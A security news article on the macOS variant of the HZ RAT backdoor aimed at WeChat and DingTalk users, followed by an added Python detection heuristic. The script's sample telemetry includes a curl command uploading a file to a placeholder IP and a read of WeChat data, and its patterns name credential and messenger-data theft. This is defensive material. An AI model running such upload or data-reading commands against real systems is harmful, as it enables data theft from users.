Apple macOS Edition of HZ RAT Malicious Backdoor Focuses on Users of Chinese Messaging Apps
The audience of Chinese instant messaging platforms like DingTalk and WeChat is the focal point of an Apple macOS variant of an insidious backdoor dubbed HZ RAT.
According to Kaspersky expert Sergey Puzan, the components “closely replicate the features of the Windows edition of the backdoor, differing solely in the payload, which is fetched as shell scripts from the hackers’ server.”
The introduction of HZ RAT was initially chronicled by the German cybersecurity firm DCSO back in November 2022, with the malware propagated through self-extracting zip packages or malevolent RTF files seemingly constructed utilizing the Royal Road RTF weaponizer.
The attack sequences tied to RTF documents are devised to deploy the Windows variant of the malware, which is activated on the compromised machine by leveraging an obsolete Microsoft Office vulnerability in the Equation Editor (CVE-2017-11882).
On the contrary, the second distribution technique disguises itself as an installer for legitimate applications such as OpenVPN, PuTTYgen, or EasyConnect, which, apart from installing the decoy program, also triggers a Visual Basic Script (VBS) that launches the RAT.
The functionalities of HZ RAT are relatively straightforward as it links to a command-and-control (C2) server to fetch further directives. This encompasses running PowerShell commands and scripts, saving miscellaneous files to the system, uploading files to the server, and sending heartbeat signals.
Owing to the confined utility of the tool, suspicions arise that the malware is predominantly utilized for gathering credentials and conducting system reconnaissance operations.
Evidence indicates that the early versions of the malware were detected in the wild as early as June 2020. The operation itself, according to DCSO, is presumed to have been in motion since at least October 2020.
The latest variant discovered by Kaspersky, uploaded to VirusTotal in July 2023, poses as OpenVPN Connect (“OpenVPNConnect.pkg”), which once initiated, gets in touch with a C2 server specified in the backdoor to execute four fundamental commands that mirror those of its Windows equivalent –
- Execute shell commands (e.g., system information, local IP address, list of installed apps, data from DingTalk, Google Password Manager, and WeChat)
- Record a file to disk
- Dispatch a file to the C2 server
- Confirm a victim’s availability
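As an added defender-side illustration (not code from Kaspersky’s report or this article), the script below scores process telemetry and flags a parent process whose children together cover several of the command categories listed above (system information, local IP, installed apps, messenger data, upload to a server). The log lines, file paths, app identifiers and the pipe-delimited format are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample process telemetry (not from the article): time|ppid|parent|cmdline
SAMPLE_LOG = """\
10:00:01|501|/bin/sh /tmp/PKInstallSandbox/postinstall|sw_vers -productVersion
10:00:02|501|/bin/sh /tmp/PKInstallSandbox/postinstall|ifconfig en0
10:00:03|501|/bin/sh /tmp/PKInstallSandbox/postinstall|ls /Applications
10:00:04|501|/bin/sh /tmp/PKInstallSandbox/postinstall|cat /Users/u/Library/Containers/com.tencent.xinWeChat/Data/x.plist
10:00:05|501|/bin/sh /tmp/PKInstallSandbox/postinstall|curl -s -F f=@/tmp/out.txt http://192.0.2.10/upload
10:01:00|777|/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal|ifconfig en0
10:01:05|777|/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal|ls /Applications
"""

# Behaviour categories mirroring the command set the article describes.
# Paths and app identifiers are assumptions for illustration, not from the article.
CATEGORIES = {
    "sysinfo": re.compile(r"\b(sw_vers|system_profiler|uname)\b"),
    "local_ip": re.compile(r"\b(ifconfig|ipconfig getifaddr)\b"),
    "app_list": re.compile(r"\bls\b.*/Applications\b"),
    "messenger_data": re.compile(r"(com\.tencent\.xinWeChat|DingTalk)", re.I),
    "password_store": re.compile(r"Google/Chrome/.*Login Data", re.I),
    "exfil": re.compile(r"\bcurl\b.*(-F|--data|-T)\b"),
}

def classify(cmdline):
    """Set of behaviour categories a single command line matches."""
    return {name for name, rx in CATEGORIES.items() if rx.search(cmdline)}

def flag_suspicious(log_text, threshold=3):
    """Return {ppid: sorted categories} for parents whose child commands
    cover at least `threshold` distinct categories. A single ifconfig in a
    Terminal is normal; the same parent also listing apps and reading
    messenger data and uploading a file is what the heuristic looks for."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue  # skip malformed lines
        _, ppid, _, cmdline = parts
        seen[ppid] |= classify(cmdline)
    return {p: sorted(c) for p, c in seen.items() if len(c) >= threshold}

if __name__ == "__main__":
    print(flag_suspicious(SAMPLE_LOG))
```

Tune the threshold to the environment; at 2 the interactive Terminal session is also flagged, which shows why the correlation across several categories matters.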
“The malware makes an attempt to access the user’s WeChatID, email and phone number from WeChat,” Puzan noted. “Regarding DingTalk, attackers demonstrate an interest in acquiring more precise user information: Name of the organization and department where the user works, username, corporate email address, [and] phone number.”

Further scrutiny of the attack structure has exposed that nearly all the C2 servers are situated in China except for two, which are established in the U.S. and the Netherlands.
In addition, the ZIP archive encompassing the macOS setup package (“OpenVPNConnect.zip”) had purportedly been downloaded from a domain owned by a Chinese video game developer known as miHoYo, recognized for titles such as Genshin Impact and Honkai.
It remains nebulous how the file was uploaded to the said domain (“vpn.mihoyo[.]com”) and whether the server had been compromised previously. Moreover, the extent of the campaign remains undisclosed, but the persistence of the backdoor’s use over time suggests a certain level of accomplishment.
“The macOS version of HZ Rat we discovered delineates that the threat actors linked to the past assaults are still operational,” Puzan conveyed. “The malware was solely harvesting user data, yet it could potentially be utilized to propagate laterally across the victim’s network, as inferred by the presence of private IP addresses in some instances.”